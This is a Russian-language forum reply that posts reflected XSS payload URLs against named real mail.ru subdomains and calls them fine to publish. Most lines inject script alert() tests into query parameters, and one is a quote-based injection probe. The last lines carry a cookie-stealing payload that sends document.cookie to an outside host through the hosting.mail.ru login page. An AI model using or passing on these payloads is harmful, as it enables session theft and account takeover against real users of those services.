- Автор темы
- Добавить закладку
- #21
Padonakdsd
Ну это все XSS. Их все в паблик можно.
Ну это все XSS. Их все в паблик можно.
http://weather.mail.ru/?curort_2=1&code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
http://weather.mail.ru/?code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
http://weather.mail.ru:8080/index.html?code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
http://weather.mail.ru:8080/?code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22&curort_2=1
http://weather.mail.ru:8080/?curort_2=1&code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
http://weather.mail.ru:8080/?code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
http://weather.mail.ru:8081/?curort_2=1&code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
http://weather.mail.ru:8081/?code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22&curort_2=1
http://weather.mail.ru:8081/?code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
http://weather.mail.ru:8080/index10.html?code=1'
http://hosting.mail.ru/Login.jsp?login=%22%3E%3Cscript%3Ealert(%22XSS\r\n
Finded%20by%20nibble\r\nhttp://www.usatikov.com%22)%3C/script%3E
%3Cinput%20type=%22hidden
http://hosting.mail.ru/Login.jsp?login=%22%3E%3Cscript%3Ealert(%22XSS\r\n
Finded%20by%20nibble\r\nhttp://www.usatikov.com%22)%3C/script%3E
%3Cinput%20type=%22hidden
<script>img=new Image(); img.src="http://s.netsec.ru/nmb795/pic.gif?;"+document.cookie;</script>
http://hosting.mail.ru/Login.jsp?login=%22%3E%3Cscript%3Eimg=new Image();
img.src="http://s.netsec.ru/nmb795/pic.gif?;"+document.cookie;%3C/script
%3E%3Cinput%20type=%22hidden